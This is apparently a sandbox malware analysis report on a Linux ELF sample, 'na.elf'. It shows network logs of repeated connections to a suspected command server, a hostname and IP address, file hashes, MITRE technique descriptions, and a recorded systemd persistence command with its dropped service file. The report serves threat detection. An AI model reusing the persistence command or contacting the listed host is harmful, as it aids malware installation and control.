Oct 7, 2024 16:34:29.852854013 CEST	41648	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:29.857637882 CEST	23561	41648	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:35.951405048 CEST	41650	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:35.956232071 CEST	23561	41650	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:35.956368923 CEST	41650	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:35.957045078 CEST	41650	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:35.961844921 CEST	23561	41650	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:37.739141941 CEST	23561	41650	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:37.739345074 CEST	41650	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:37.744431019 CEST	23561	41650	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:41.751789093 CEST	41652	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:41.756580114 CEST	23561	41652	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:41.756629944 CEST	41652	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:41.757201910 CEST	41652	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:41.761945009 CEST	23561	41652	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:43.483992100 CEST	23561	41652	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:43.484236956 CEST	41652	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:43.489440918 CEST	23561	41652	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:50.498977900 CEST	41654	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:50.503834009 CEST	23561	41654	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:50.503899097 CEST	41654	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:50.505060911 CEST	41654	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:50.509984970 CEST	23561	41654	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:52.244847059 CEST	23561	41654	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:52.245122910 CEST	41654	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:52.250047922 CEST	23561	41654	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:53.259727955 CEST	41656	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:53.264549971 CEST	23561	41656	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:53.264614105 CEST	41656	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:53.266633034 CEST	41656	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:53.271388054 CEST	23561	41656	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:55.066499949 CEST	23561	41656	91.200.103.117	192.168.2.15
Oct 7, 2024 16:34:55.066673994 CEST	41656	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:34:55.071543932 CEST	23561	41656	91.200.103.117	192.168.2.15
Oct 7, 2024 16:35:00.087125063 CEST	41658	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:35:00.091969013 CEST	23561	41658	91.200.103.117	192.168.2.15
Oct 7, 2024 16:35:00.092051983 CEST	41658	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:35:00.092749119 CEST	41658	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:35:00.097583055 CEST	23561	41658	91.200.103.117	192.168.2.15
Oct 7, 2024 16:35:01.789494991 CEST	23561	41658	91.200.103.117	192.168.2.15
Oct 7, 2024 16:35:01.789719105 CEST	41658	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:35:01.794609070 CEST	23561	41658	91.200.103.117	192.168.2.15
Oct 7, 2024 16:35:04.801256895 CEST	41660	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:35:04.808361053 CEST	23561	41660	91.200.103.117	192.168.2.15
Oct 7, 2024 16:35:04.808434010 CEST	41660	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:35:04.809190989 CEST	41660	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:35:04.814340115 CEST	23561	41660	91.200.103.117	192.168.2.15
Oct 7, 2024 16:35:06.481534958 CEST	23561	41660	91.200.103.117	192.168.2.15
Oct 7, 2024 16:35:06.481676102 CEST	41660	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:35:06.487608910 CEST	23561	41660	91.200.103.117	192.168.2.15
Oct 7, 2024 16:35:13.492958069 CEST	41662	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:35:13.497859955 CEST	23561	41662	91.200.103.117	192.168.2.15
Oct 7, 2024 16:35:13.497915983 CEST	41662	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:35:13.498789072 CEST	41662	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:35:13.504443884 CEST	23561	41662	91.200.103.117	192.168.2.15
Oct 7, 2024 16:35:15.260978937 CEST	23561	41662	91.200.103.117	192.168.2.15
Oct 7, 2024 16:35:15.261162043 CEST	41662	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:35:15.266979933 CEST	23561	41662	91.200.103.117	192.168.2.15
Oct 7, 2024 16:35:18.272593975 CEST	41664	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:35:18.278896093 CEST	23561	41664	91.200.103.117	192.168.2.15
Oct 7, 2024 16:35:18.278961897 CEST	41664	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:35:18.279983044 CEST	41664	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:35:18.284868956 CEST	23561	41664	91.200.103.117	192.168.2.15
Oct 7, 2024 16:35:19.943147898 CEST	23561	41664	91.200.103.117	192.168.2.15
Oct 7, 2024 16:35:19.943312883 CEST	41664	23561	192.168.2.15	91.200.103.117
Oct 7, 2024 16:35:19.948471069 CEST	23561	41664	91.200.103.117	192.168.2.15

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 16:31:45.132044077 CEST	52320	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:31:45.139492989 CEST	53	52320	8.8.8.8	192.168.2.15
Oct 7, 2024 16:31:52.819508076 CEST	54780	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:31:53.028981924 CEST	53	54780	8.8.8.8	192.168.2.15
Oct 7, 2024 16:32:00.691991091 CEST	44220	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:32:00.699559927 CEST	53	44220	8.8.8.8	192.168.2.15
Oct 7, 2024 16:32:10.316546917 CEST	57668	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:32:10.323684931 CEST	53	57668	8.8.8.8	192.168.2.15
Oct 7, 2024 16:32:15.974654913 CEST	41937	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:32:15.981636047 CEST	53	41937	8.8.8.8	192.168.2.15
Oct 7, 2024 16:32:24.596925020 CEST	44190	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:32:24.604088068 CEST	53	44190	8.8.8.8	192.168.2.15
Oct 7, 2024 16:32:31.278543949 CEST	56978	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:32:31.286689043 CEST	53	56978	8.8.8.8	192.168.2.15
Oct 7, 2024 16:32:42.933284044 CEST	48571	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:32:42.940320969 CEST	53	48571	8.8.8.8	192.168.2.15
Oct 7, 2024 16:32:50.876192093 CEST	42973	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:32:50.883510113 CEST	53	42973	8.8.8.8	192.168.2.15
Oct 7, 2024 16:32:59.752882004 CEST	44874	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:32:59.880291939 CEST	53	44874	8.8.8.8	192.168.2.15
Oct 7, 2024 16:33:02.537036896 CEST	49017	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:33:02.544117928 CEST	53	49017	8.8.8.8	192.168.2.15
Oct 7, 2024 16:33:12.179807901 CEST	38594	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:33:12.187648058 CEST	53	38594	8.8.8.8	192.168.2.15
Oct 7, 2024 16:33:16.803380013 CEST	55641	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:33:16.810549974 CEST	53	55641	8.8.8.8	192.168.2.15
Oct 7, 2024 16:33:27.427424908 CEST	45751	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:33:27.437187910 CEST	53	45751	8.8.8.8	192.168.2.15
Oct 7, 2024 16:33:39.072458029 CEST	42415	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:33:39.079920053 CEST	53	42415	8.8.8.8	192.168.2.15
Oct 7, 2024 16:33:50.725521088 CEST	37956	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:33:50.733082056 CEST	53	37956	8.8.8.8	192.168.2.15
Oct 7, 2024 16:34:02.349206924 CEST	53427	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:34:02.362937927 CEST	53	53427	8.8.8.8	192.168.2.15
Oct 7, 2024 16:34:06.636332035 CEST	38172	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:34:06.654851913 CEST	53	38172	8.8.8.8	192.168.2.15
Oct 7, 2024 16:34:11.324486017 CEST	48134	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:34:11.331882954 CEST	53	48134	8.8.8.8	192.168.2.15
Oct 7, 2024 16:34:16.843997002 CEST	53512	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:34:16.851047039 CEST	53	53512	8.8.8.8	192.168.2.15
Oct 7, 2024 16:34:27.010569096 CEST	47638	53	192.168.2.15	1.1.1.1
Oct 7, 2024 16:34:27.010659933 CEST	46592	53	192.168.2.15	1.1.1.1
Oct 7, 2024 16:34:27.017812014 CEST	53	46592	1.1.1.1	192.168.2.15
Oct 7, 2024 16:34:27.032597065 CEST	53	47638	1.1.1.1	192.168.2.15
Oct 7, 2024 16:34:27.886390924 CEST	50523	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:34:27.893830061 CEST	53	50523	8.8.8.8	192.168.2.15
Oct 7, 2024 16:34:35.940676928 CEST	58519	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:34:35.950792074 CEST	53	58519	8.8.8.8	192.168.2.15
Oct 7, 2024 16:34:41.740803957 CEST	36301	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:34:41.751394987 CEST	53	36301	8.8.8.8	192.168.2.15
Oct 7, 2024 16:34:50.486962080 CEST	49527	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:34:50.498312950 CEST	53	49527	8.8.8.8	192.168.2.15
Oct 7, 2024 16:34:53.249746084 CEST	55583	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:34:53.257376909 CEST	53	55583	8.8.8.8	192.168.2.15
Oct 7, 2024 16:35:00.069247007 CEST	51070	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:35:00.086395979 CEST	53	51070	8.8.8.8	192.168.2.15
Oct 7, 2024 16:35:04.791538954 CEST	55826	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:35:04.800574064 CEST	53	55826	8.8.8.8	192.168.2.15
Oct 7, 2024 16:35:13.485408068 CEST	40260	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:35:13.492445946 CEST	53	40260	8.8.8.8	192.168.2.15
Oct 7, 2024 16:35:18.264650106 CEST	60156	53	192.168.2.15	8.8.8.8
Oct 7, 2024 16:35:18.272126913 CEST	53	60156	8.8.8.8	192.168.2.15

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 7, 2024 16:31:45.132044077 CEST	192.168.2.15	8.8.8.8	0x3ff9	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:52.819508076 CEST	192.168.2.15	8.8.8.8	0x2608	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:00.691991091 CEST	192.168.2.15	8.8.8.8	0xa20a	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:10.316546917 CEST	192.168.2.15	8.8.8.8	0x7773	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:15.974654913 CEST	192.168.2.15	8.8.8.8	0x7ebe	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:24.596925020 CEST	192.168.2.15	8.8.8.8	0xefc8	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:31.278543949 CEST	192.168.2.15	8.8.8.8	0xc94	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:42.933284044 CEST	192.168.2.15	8.8.8.8	0xeb08	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:50.876192093 CEST	192.168.2.15	8.8.8.8	0x11bf	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:59.752882004 CEST	192.168.2.15	8.8.8.8	0xe3f5	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:33:02.537036896 CEST	192.168.2.15	8.8.8.8	0x4981	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:33:12.179807901 CEST	192.168.2.15	8.8.8.8	0x4b27	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:33:16.803380013 CEST	192.168.2.15	8.8.8.8	0x1169	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:33:27.427424908 CEST	192.168.2.15	8.8.8.8	0x1df5	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:33:39.072458029 CEST	192.168.2.15	8.8.8.8	0x77cc	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:33:50.725521088 CEST	192.168.2.15	8.8.8.8	0x8a17	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:02.349206924 CEST	192.168.2.15	8.8.8.8	0x7e02	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:06.636332035 CEST	192.168.2.15	8.8.8.8	0x46a8	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:11.324486017 CEST	192.168.2.15	8.8.8.8	0xc6bb	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:16.843997002 CEST	192.168.2.15	8.8.8.8	0x10d1	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:27.010569096 CEST	192.168.2.15	1.1.1.1	0x19fe	Standard query (0)	daisy.ubuntu.com	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:27.010659933 CEST	192.168.2.15	1.1.1.1	0x25d1	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false
Oct 7, 2024 16:34:27.886390924 CEST	192.168.2.15	8.8.8.8	0x51	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:35.940676928 CEST	192.168.2.15	8.8.8.8	0x6e28	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:41.740803957 CEST	192.168.2.15	8.8.8.8	0xa283	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:50.486962080 CEST	192.168.2.15	8.8.8.8	0x10e4	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:53.249746084 CEST	192.168.2.15	8.8.8.8	0xf4c0	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:35:00.069247007 CEST	192.168.2.15	8.8.8.8	0xdedd	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:35:04.791538954 CEST	192.168.2.15	8.8.8.8	0xb232	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:35:13.485408068 CEST	192.168.2.15	8.8.8.8	0x82fa	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:35:18.264650106 CEST	192.168.2.15	8.8.8.8	0xafc6	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 16:31:45.139492989 CEST	8.8.8.8	192.168.2.15	0x3ff9	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:31:53.028981924 CEST	8.8.8.8	192.168.2.15	0x2608	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:00.699559927 CEST	8.8.8.8	192.168.2.15	0xa20a	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:10.323684931 CEST	8.8.8.8	192.168.2.15	0x7773	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:15.981636047 CEST	8.8.8.8	192.168.2.15	0x7ebe	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:24.604088068 CEST	8.8.8.8	192.168.2.15	0xefc8	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:31.286689043 CEST	8.8.8.8	192.168.2.15	0xc94	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:42.940320969 CEST	8.8.8.8	192.168.2.15	0xeb08	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:50.883510113 CEST	8.8.8.8	192.168.2.15	0x11bf	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:32:59.880291939 CEST	8.8.8.8	192.168.2.15	0xe3f5	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:33:02.544117928 CEST	8.8.8.8	192.168.2.15	0x4981	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:33:12.187648058 CEST	8.8.8.8	192.168.2.15	0x4b27	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:33:16.810549974 CEST	8.8.8.8	192.168.2.15	0x1169	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:33:27.437187910 CEST	8.8.8.8	192.168.2.15	0x1df5	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:33:39.079920053 CEST	8.8.8.8	192.168.2.15	0x77cc	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:33:50.733082056 CEST	8.8.8.8	192.168.2.15	0x8a17	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:02.362937927 CEST	8.8.8.8	192.168.2.15	0x7e02	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:06.654851913 CEST	8.8.8.8	192.168.2.15	0x46a8	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:11.331882954 CEST	8.8.8.8	192.168.2.15	0xc6bb	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:16.851047039 CEST	8.8.8.8	192.168.2.15	0x10d1	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:27.032597065 CEST	1.1.1.1	192.168.2.15	0x19fe	No error (0)	daisy.ubuntu.com	162.213.35.25	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:27.032597065 CEST	1.1.1.1	192.168.2.15	0x19fe	No error (0)	daisy.ubuntu.com	162.213.35.24	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:27.893830061 CEST	8.8.8.8	192.168.2.15	0x51	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:35.950792074 CEST	8.8.8.8	192.168.2.15	0x6e28	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:41.751394987 CEST	8.8.8.8	192.168.2.15	0xa283	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:50.498312950 CEST	8.8.8.8	192.168.2.15	0x10e4	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:34:53.257376909 CEST	8.8.8.8	192.168.2.15	0xf4c0	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:35:00.086395979 CEST	8.8.8.8	192.168.2.15	0xdedd	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:35:04.800574064 CEST	8.8.8.8	192.168.2.15	0xb232	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:35:13.492445946 CEST	8.8.8.8	192.168.2.15	0x82fa	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:35:18.272126913 CEST	8.8.8.8	192.168.2.15	0xafc6	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: na.elf PID: 5532, Parent PID: 5454

General

Start time (UTC):	14:31:44
Start date (UTC):	07/10/2024
Path:	/tmp/na.elf
Arguments:	/tmp/na.elf
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	14:31:44
Start date (UTC):	07/10/2024
Path:	/tmp/na.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	14:31:44
Start date (UTC):	07/10/2024
Path:	/tmp/na.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	14:31:44
Start date (UTC):	07/10/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable sbolo.service > /dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	14:31:44
Start date (UTC):	07/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	14:31:44
Start date (UTC):	07/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable sbolo.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	14:31:44
Start date (UTC):	07/10/2024
Path:	/tmp/na.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	14:31:44
Start date (UTC):	07/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	14:31:44
Start date (UTC):	07/10/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report na.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/systemd/system/sbolo.service

/memfd:snapd-env-generator (deleted)

/tmp/qemu-open.iX82IG (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: na.elf PID: 5532, Parent PID: 5454

General

Chronological Activities

Analysis Process: na.elf PID: 5534, Parent PID: 5532

General

Chronological Activities

Analysis Process: na.elf PID: 5537, Parent PID: 5532

General

Chronological Activities

Analysis Process: sh PID: 5537, Parent PID: 5532

General

Chronological Activities

Linux Analysis Report
na.elf